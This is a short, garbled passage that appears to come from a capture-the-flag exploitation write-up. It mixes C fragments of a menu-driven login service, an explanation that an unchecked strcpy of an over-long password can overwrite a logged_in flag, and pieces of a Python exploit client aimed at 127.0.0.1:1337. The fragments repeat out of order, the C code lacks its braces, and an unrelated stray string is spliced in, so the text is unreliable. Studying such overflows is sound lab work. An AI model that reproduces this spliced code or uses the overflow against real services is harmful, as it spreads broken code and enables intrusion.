int main(void) setbuf(stdout, NULL); while (1) menu(); int choice; if (scanf("%d%*c", &choice) != 1) break; switch (choice) case 1: register_user(); break; case 2: login(); break; case 3: show_secret(); break; case 4: exit(0); default: puts("Invalid"); break; return 0;
strcpy(user->pwd, buf); Thus, an overflow of buf can overflow that user->pwd points to! By providing an over‑long password we can write past the allocated 0x80 bytes of pwd and reach the logged_in variable located at 0x603200 (example address). tokyohot n0541
typedef struct char *name; char *pwd; user_t; int main(void) setbuf(stdout, NULL); while (1) menu(); int
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> int main(void) setbuf(stdout
def register(s): menu(s) s.sendall(b'1\n') recvuntil(s, b'Name: ') s.sendall(b'A'*8 + b'\n') recvuntil(s, b'Password: ') s.sendall(b'B'*8 + b'\n')
HOST = "127.0.0.1" PORT = 1337 # change to the port the service is bound to